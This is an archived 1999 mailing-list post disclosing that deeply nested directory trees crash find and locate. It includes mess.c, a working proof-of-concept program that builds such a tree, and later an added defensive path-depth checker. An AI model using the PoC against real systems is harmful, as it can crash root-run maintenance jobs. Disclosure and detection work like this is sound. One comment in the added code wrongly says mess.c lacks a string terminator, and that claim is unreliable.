Re: Buffer overflow in ftpd and locate bug

From: Przemyslaw Frasunek (venglinat_private)
Date: Wed Dec 31 1969 - 15:59:59 PST


    
    >   I had a problem with locate from findutils-4.1.24.rpm from Redhat-5.1.
    > It segfaults if we have a huge directory at incoming ftp which was created
    > by exploits for the ftpd realpath hole. My ftpd is patched. Those exploits,
    > I think, should not frighten me, but if updatedb puts that directory into
    > the locate database, then locate segfaults (getline.c, line 104, according to gdb).
    > I guess it can be used for running arbitrary commands if root runs locate.
    
      I've noticed a similar problem with /usr/bin/find on FreeBSD. By
    creating a _very_ long and deep directory structure it's possible
    to segfault /usr/bin/find (it's also used in the /etc/periodic scripts,
    which run as root).
    
      Example:
    
      I'm creating a directory structure with 300 subdirectories, each
    255 chars long (source in the attachment; it's also possible to do it
    via ftpd, because it calls mkdir() and chdir()).
    
    lagoon:venglin:/tmp/jc> find example > /dev/null
    Segmentation fault (core dumped)
    
      Gdb shows that the function puts() was overflowed when it tried to
    print a very long path.
    
      Also, other system tools (rm, ls) have big problems with such
    directory structures.
    
    --
    * Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
    * Inet: venglinat_private ** PGP:D48684904685DF43EA93AFA13BE170BF *
       ---- File information -----------
         File:  mess.c
         Date:  2 May 1999, 19:01
         Size:  748 bytes.
         Type:  Text
    
    
    #include <stdio.h>
    #include <stdlib.h>     /* exit(), atoi() */
    #include <string.h>     /* memset(), strerror() */
    #include <errno.h>
    #include <unistd.h>     /* chdir() */
    #include <sys/stat.h>   /* mkdir() */
    
    #define DUMP 0x41       /* 'A': every directory name is 255 of these */
    
    int main(int argc, char *argv[]) {
    
    	char buf[256];      /* 255 name bytes plus the terminating NUL */
    	int i = 0;
    
    	if (argc < 3) { fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]); exit(1); }
    
    	if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); }
    
    	memset(buf, DUMP, 255);
    	buf[255] = '\0';    /* mkdir()/chdir() need a NUL-terminated name */
    
    	/* descend one level per iteration: create the directory, then step into it */
    	for(i=0;i<(atoi(argv[2]))-1;i++) {
    	  if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
    	  if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
    	}
    
    	exit(0);
    }
    
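The problem described above is that tools like find(1) build the full path of every entry into a fixed buffer, so a tree whose paths exceed PATH_MAX breaks them. The code below is an added example, not part of the original post or of any vendor's find: it measures the longest path under a directory (for instance an ftp incoming area) using only fd-relative calls, so the check itself never assembles a path and cannot hit the same limit. `build_deep_tree` is a constructed test-input helper doing what mess.c does with mkdirat() instead of chdir(); `longest_path_under` and `walk` are hypothetical names.

```c
#define _POSIX_C_SOURCE 200809L   /* openat(), mkdirat(), fstatat(), fdopendir() */
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* Constructed test input: `depth` nested dirs under root, each `namelen` 'A's,
 * built with fd-relative calls only, so it works past PATH_MAX without chdir(). */
int build_deep_tree(const char *root, int depth, size_t namelen) {
    char name[NAME_MAX + 1];
    if (namelen > NAME_MAX) return -1;
    memset(name, 'A', namelen); name[namelen] = '\0';   /* terminator mess.c lacks */
    (void)mkdir(root, 0700);                    /* may already exist; open() checks */
    int fd = open(root, O_RDONLY | O_DIRECTORY);
    for (int i = 0; fd >= 0 && i < depth; i++) {
        if (mkdirat(fd, name, 0700) != 0 && errno != EEXIST) { close(fd); return -1; }
        int next = openat(fd, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
        close(fd); fd = next;
    }
    if (fd >= 0) close(fd);
    return fd < 0 ? -1 : 0;
}
/* Walk below dirfd without assembling any path string, recording the longest
 * "root/a/b/c" length find(1) would build. fdopendir() takes over dirfd. */
static void walk(int dirfd, size_t len, size_t *max_len) {
    DIR *d = fdopendir(dirfd);
    if (!d) { close(dirfd); return; }
    for (struct dirent *e; (e = readdir(d)) != NULL; ) {
        struct stat st;
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        if (fstatat(dirfd, e->d_name, &st, AT_SYMLINK_NOFOLLOW) != 0) continue;
        size_t child = len + 1 + strlen(e->d_name);               /* "/" + name */
        if (child > *max_len) *max_len = child;
        if (!S_ISDIR(st.st_mode)) continue;
        /* one fd stays open per level while descending; EMFILE just skips */
        int fd = openat(dirfd, e->d_name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
        if (fd >= 0) walk(fd, child, max_len);
    }
    closedir(d);                                /* also closes dirfd */
}
/* Longest path length under root (0 if root cannot be opened); a result
 * >= PATH_MAX means a PATH_MAX buffer overflows or syscalls fail ENAMETOOLONG. */
size_t longest_path_under(const char *root) {
    size_t max_len = strlen(root);
    int fd = open(root, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return 0;
    walk(fd, max_len, &max_len);
    return max_len;
}
```

A periodic job comparing `longest_path_under()` against PATH_MAX on writable upload directories flags such trees before a root cron job runs find or updatedb over them.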
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:42 PDT